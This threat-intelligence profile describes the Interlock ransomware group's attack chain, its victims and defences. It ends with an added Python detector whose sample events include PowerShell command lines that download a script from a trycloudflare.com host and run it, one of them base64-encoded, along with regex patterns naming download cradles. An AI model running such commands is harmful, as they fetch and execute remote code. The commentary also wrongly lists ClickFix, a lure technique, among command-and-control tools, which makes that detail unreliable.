Threat Actor Profile: Interlock Ransomware

NetmanageIT OpenCTI - opencti.netmanageit.com

SUMMARY :

Interlock, a relatively new ransomware group first observed in September 2024, has gained prominence in 2025 as an opportunistic ransomware operator. Unlike traditional Ransomware-as-a-Service models, Interlock operates without affiliates or public advertisements. The group conducts double extortion campaigns, leveraging compromised websites and multi-stage social engineering techniques to deliver payloads. Interlock's attack chain involves initial access through fake software updaters, execution of PowerShell scripts, and the use of custom remote access trojans. The group has targeted various sectors across North America and Europe, including education, healthcare, technology, and government entities. Notable attacks include the DaVita breach in April 2025 and the ransomware attack on the city of St. Paul, Minnesota in July 2025.

OPENCTI LABELS :

cobalt strike, powershell, social engineering, ransomware, remote access trojan, systembc, clickfix, double extortion, trycloudflare, compromised websites, interlock rat, nodesnake rat


AI COMMENTARY :

1. Threat Actor Profile: Interlock Ransomware is a group first observed in September 2024 that has quickly become a prominent opportunistic ransomware operator in 2025. Unlike conventional RaaS operations that rely on affiliates and public ads, Interlock maintains a lean structure, handling every stage of an attack internally.

2. Emergence and Operational Model: Interlock's distinctive approach bypasses affiliate networks and resists outsourcing, relying on customized tools such as Interlock RAT and NodeSnake RAT. The group specializes in double extortion schemes, first encrypting data and then threatening to publish stolen information if victims refuse to pay. Its marketing is clandestine, with no advertisements in underground forums, increasing the difficulty for defenders to understand its full reach.

3. Attack Chain and Techniques: The initial compromise often begins with multi-stage social engineering campaigns. Victims receive fake software updaters that deploy PowerShell scripts designed to fetch additional payloads. Once inside the network, Interlock uses bespoke remote access trojans and third-party frameworks like Cobalt Strike for lateral movement. Tools such as SystemBC, ClickFix, and TryCloudflare facilitate covert command and control communication, while compromised websites serve as drop points for malicious installers and scripts.

4. Targets and Impact: Interlock's victims span education, healthcare, technology, and government in North America and Europe. High-profile incidents include the April 2025 DaVita breach, where patient records were stolen before encryption, and the July 2025 attack on the city of St. Paul, Minnesota, which disrupted municipal services. Each of these double extortion cases demonstrates Interlock's willingness to exploit critical infrastructure and sensitive data for maximum leverage.

5. Defensive Considerations and Threat Intelligence: Organizations can strengthen their defenses by monitoring for indicators of compromise such as unusual PowerShell activity and unexpected Cobalt Strike beacons. Threat intelligence professionals should track known Interlock RAT command servers and analyze phishing URLs hosted on compromised websites. Adoption of layered security controls, network segmentation, and robust incident response plans can reduce exposure to double extortion scenarios.
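As an added illustration of the "unusual PowerShell activity" monitoring mentioned above (not part of the OpenCTI report), the following Python triages process-creation events for the download stage described in the attack chain: a PowerShell download cradle, a trycloudflare.com URL, evasion flags and encoded commands. The sample events, the browser-parent heuristic and the domain names are constructed assumptions for this example.

```python
import base64
import re

# Constructed sample events (parent image, child image, command line), shaped
# like a Sysmon Event ID 1 / EDR process-creation feed; not from the report.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('https://x.trycloudflare.com/a')".encode("utf-16-le")
).decode()
SAMPLE_EVENTS = [
    ("chrome.exe", "powershell.exe",
     'powershell -w hidden -ep bypass -c "iwr https://update-check.trycloudflare.com/u.ps1 | iex"'),
    ("explorer.exe", "powershell.exe", f"powershell -nop -enc {ENCODED_PAYLOAD}"),
    ("services.exe", "powershell.exe", r"powershell -File C:\ProgramData\Backup\nightly.ps1"),
]

CRADLE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|net\.webclient)\b", re.I)
TRYCLOUDFLARE = re.compile(r"https?://[\w.-]+\.trycloudflare\.com", re.I)
EVASION = re.compile(r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass", re.I)
ENCODED = re.compile(r"-(e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Assumption: a fake updater served from a compromised website is launched from a browser.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze(parent, child, cmdline):
    """Return the reasons an event looks like a PowerShell download stage (empty if benign)."""
    if child.lower() != "powershell.exe":
        return []
    text = cmdline + " " + decode_encoded_command(cmdline)  # inspect the decoded payload too
    reasons = []
    if CRADLE.search(text):
        reasons.append("download cradle")
    if TRYCLOUDFLARE.search(text):
        reasons.append("trycloudflare.com tunnel URL")
    if EVASION.search(cmdline):
        reasons.append("hidden window / execution policy bypass")
    if ENCODED.search(cmdline):
        reasons.append("encoded command")
    if parent.lower() in BROWSERS:
        reasons.append("spawned by browser")
    return reasons

def triage(events):
    """Keep only events with at least one reason, as (command line, reasons) pairs."""
    return [(c, r) for p, ch, c in events if (r := analyze(p, ch, c))]
```

In a real deployment the same checks would run over the EDR's process telemetry, with the encoded-command decoder applied before any keyword matching so that base64 does not hide the cradle.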

6. Conclusion and Outlook: As Interlock continues to refine its toolset and expand its scope without relying on affiliates, it underscores the evolution of ransomware tactics toward smaller, specialized teams. Continuous threat intelligence gathering, proactive hunting for signs of infection, and timely patch management remain critical to countering this emerging threat actor.
